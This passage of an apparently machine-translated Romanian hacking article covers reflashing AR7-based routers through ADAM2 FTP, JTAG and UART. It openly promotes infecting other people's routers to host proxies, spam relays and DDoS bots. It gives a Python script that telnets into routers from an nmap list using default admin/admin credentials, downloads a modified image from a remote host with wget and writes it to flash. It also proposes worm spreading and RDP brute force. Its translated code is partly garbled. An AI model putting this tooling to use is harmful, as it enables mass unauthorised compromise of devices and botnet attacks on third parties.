comutați sesiunea FTP în modul binar:

ftp> citat MEDIA FLSH

Acum trimitem, de exemplu, o imagine a sistemului de fișiere și indicăm locația
destinatii:

ftp> pune fs.img „fs.img mtd0”

Așteptăm sfârșitul înregistrării, reporniți routerul, ieșim din sesiune:

ftp> citat REBOOT
ftp> ieși

Toate! După cum poți vedea, nu este nimic complicat, acum dacă ceva nu merge bine, tu
poți oricând să remediezi situația.

Pentru ușurință în utilizare, ar trebui să dați o adresă IP normală, activați
incarcare automata (pentru a nu dansa cu resetare) si mariti putin timpul
așteptând conexiunea înainte de a încărca nucleul. Toți acești parametri sunt stocați în
variabile de mediu, există comenzi speciale FTP ADAM2: GETENV și SETENV (pentru
obținerea și respectiv setarea variabilei). În sesiunea FTP introduceți următoarele
comenzi:

ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp>SETENV adresa_miu,192.168.1.1
ftp> citat REBOOT
ftp> ieși

Routerul repornește și puteți accesa ADAM2 la 192.168.1.1:21. Dacă
va exista dorința de a reflash imaginea nucleului, iar nucleul va refuza să pornească, FTP
va începe de la sine. Înainte de a afișa intermitent imaginile modificate, asigurați-vă că
păstrați-le pe cele actuale pentru restaurare. În general, puteți modifica variabilele de mediu
și prin /proc/ticfg/env, am vrut doar să vă spun mai multe despre lucrul cu FTP.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

Puteți verifica modificările astfel:

# cat /proc/ticfg/env | grep adresa_miu

Ce trebuie să faceți dacă doriți să încercați să reîncărcați bootloader-ul și cum
ce sa fac in caz de esec? Sau, din anumite motive, routerul nu pornește și
nu are acces la ADAM2? Există o soluție - JTAG, sau mai degrabă, acest cip conține EJTAG
(versiunea extinsa). Aceasta este o interfață pentru depanare/programare în circuit.

Pentru a ne conecta la această interfață avem nevoie de un port LPT al computerului,
conectori și 4 rezistențe. Schema este simplă.

Mă grăbesc să observ că firmware-ul prin JTAG nu este o sarcină rapidă, va dura destul de mult
mult timp. Deci ar trebui folosit doar pentru a restabili bootloader-ul,
chiar dacă nu funcționează. Pentru a comunica prin JTAG, ar trebui să utilizați un special
program, de exemplu UrJTAG. Mai jos este un exemplu despre cum funcționează această interfață.
Configurarea conexiunii:

jtag> cablu paralel 0x378 DLC5
jtag> detect

Detectare memorie flash:

jtag> detectflash 0x30000000 1

Citirea memoriei flash:

jtag> readmem 0x30000000 0x400000 fullflash.img

Scrieți în memorie (bootloader):

jtag> flashmem 0x30000000 adam2.img

De asemenea, este util să știți despre interfața UART (am promis anterior că voi vorbi despre asta). ÎN
UART_A raportează, adică înregistrează bootloader-ul (într-un stadiu incipient al pornirii de la
poți comunica cu el) și nucleul. Când scrieți nuclee modificate acest lucru
indispensabil pentru depanare. UART - Receptor/Transmițător asincron universal
(transceiver universal asincron) este aproape întotdeauna prezent
microcontrolere.

Circuitul adaptorului este foarte simplu. Bazat pe un singur cip -
Convertor de nivel TTL: MAX232 pentru COM și FT232R pentru USB. Microcircuite
Sunt destul de comune și nu vor fi probleme cu achiziția.

Circuitul este asamblat pe o placă (care poate fi plasată cu ușurință într-o carcasă
conector port COM) în 20 de minute și aduce o mulțime de beneficii. De exemplu, la depanare
nucleele sunt o soluție absolut de neînlocuit. Ce se întâmplă dacă electronica este o problemă? Ieșire
sunt cabluri USB pentru telefoane vechi, au doar un convertor
UART - USB.

Câteva idei de distribuție

Este grozav să ai propriul tău proxy/sox pe routerul altcuiva. La fel ca spam-ul
router pentru toate protocoalele. Acesta nu este un computer Windows, care
reamenajat lunar :). Routerele nu sunt adesea schimbate sau reflashate. da si
Cine altcineva în afară de noi s-ar gândi la ideea de a infecta un router?

Nu uitați, avem controlul asupra întregului trafic de la utilizator/rețea. Pentru mai mult
În routerele puternice este deja posibil să suspendați un bot DDOS. Ascunde fișierul/ascunde procesul,
interceptați scrierea în blocuri mtd fără a suprascrie programul nostru - toate acestea
tot ceea ce!

Să presupunem că sunteți pe cale să începeți să scrieți un program serios pentru un router.
Depanarea foarte bună este importantă, probabil va trebui să o faceți de câteva ori
rescrie/restaurează imagini... Aceasta este o perspectivă foarte tristă. Chiar și mâinile
scăpați puțin, dacă luați în considerare și că resursa de rescriere a memoriei Flash
este mic (mai multe detalii în documentația pentru cipul de memorie) și există o perspectivă
ruina-o. Dar există o cale de ieșire! Qemu poate emula AR7! Vă puteți imagina ce
oferă oportunități și confort nelimitat? Acum nimic nu ne oprește
scrie ceva incredibil de tare!

Asa de. Ai scris un program, l-ai testat pe cont propriu sau pe routerele altor 1-2 persoane, dar
toată rețeaua este încă înainte, infectarea manuală este o corvoadă, pe al 10-lea router deja porniți
blestemă lumea întreagă și șirurile „cat” și „mtd” plutesc în ochii tăi. Hai să scriem
un program pentru automatizarea acestor acțiuni de rutină. Am ales limbajul python.

Planul de lucru este următorul:

• faceți o listă de routere, de exemplu, folosind nmap;
• scriptul ar trebui să ia adrese IP din listă în ordine, introduceți prin
  telnet cu autentificare/parolă standard;
• apoi aceiași pași: încărcați imaginea modificată,
  rescrie, repornește.

#!/usr/bin/env python
#Encode=UTF-8

import telnetlib,time

SERVER="http://anyhost.com/fs.image"

pentru addr in open ("iplist.txt"):
telnet = telnetlib.Telnet(adresa)
telnet.set_debuglevel(1)
telnet.read_until("login:")
timp.somn(5)
telnet.write(„admin\n”)
telnet.read_until("Parola:")
telnet.write(„admin\n”)
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write(„repornire”)
telnet.close()

Logica scenariului este foarte departe de a fi ideală, acum voi explica de ce. Pentru
În primul rând, ar trebui să verificați versiunea de firmware/kernel și modelul de router, deoarece ar putea exista
diferențe serioase în muncă. Apoi, în loc de spații de firmware, ar trebui să descărcați
imaginea sistemului de fișiere de pe router, despachetați, modificați și trimiteți
înapoi. Acest lucru va elimina problemele care apar cu compatibilitatea în diferite
modele/versiuni de firmware, deoarece stabilitatea funcționării este cel mai important lucru pentru dumneavoastră.
De asemenea, un virus poate avea funcțiile unui vierme, iar dacă doriți, puteți oricând
atașați un scanner de rețea, forță brută pentru RDP și caracteristici similare acestuia.

Există o altă modalitate grozavă de a o răspândi. Nimic nu te împiedică să scrii
program pentru Windows, pe care îl veți avea cu dvs. (sau descărcați de pe dvs
server) imaginea sistemului de fișiere și infectați routerul cu aceasta, dacă este prezent.
Distribuiți acest program în toate modurile „standard”: unități amovibile,
exploit-uri pentru programe, infectarea altor programe... Prin combinarea acestor metode,
Puteți crea o pandemie gravă. Imaginează-ți imaginea asta - până la urmă
Astfel de dispozitive sunt omniprezente.

Protecție router

După ce am săpat toate acestea, m-am gândit: cum pot proteja routerul? Și apoi, vezi tu, și
O să ajung și eu acolo. Primul pas este schimbarea parolei utilizatorului într-o parolă mai complexă și
lung (limită de 8 caractere), schimbați bannere și felicitări de serviciu
(editor hexadecimal sau, de preferință, programe de recompilare) în ordine
nmap sau alte scanere nu au putut determina versiunile serviciului.

Ar trebui să schimbați și porturile de care atârnă demonii. Acest lucru este realizat de
modificări la progdefs.xml. Omorâți telnetul (cel mai ușor mod de a ghici parola, da
iar protocolul este neprotejat, de ce avem nevoie), activați firewall-ul, permiteți conexiunea
accesați serviciile numai de la propria dumneavoastră adresă IP sau MAC. Utilizați și un firewall
pentru a proteja o rețea sau un computer, nu degeaba este prezent. Configurare inteligentă
regulile te vor ajuta întotdeauna să te protejezi.

Concluzie

Multe, nu numai routerele D-Link și alte dispozitive similare sunt construite pe care
Cipul AR7, lista include Acorp, NetGear, Linksys, Actionec... Destul
Acest AR7 este popular împreună cu MontaVista. Rezultă că, folosind același
toolchain, puteți efectua fără probleme pașii descriși în articol.

Gândește-te bine: pe lângă acțiunile dăunătoare, poți să faci și ceva util/plăcut pentru tine
și altele (nu mă cert, plăcerea de a hacking nu poate fi înlocuită, dar totuși).
Vă puteți crea propriul firmware, de exemplu, routere mai puternice care pot
descărcați/distribuiți torrente... Toate modelele au interfață USB 1.1, dar la cele mai tinere
modele nu este lipit. Adăugați un modul USB și un driver de sistem de fișiere la kernel,
echipeaza routerul cu memorie Flash - si in final primesti un fel de stocare in retea pt
bani mici. Există o mulțime de opțiuni, dar ideile ar trebui să apară în mii - nu
limitează-te, creează și creează!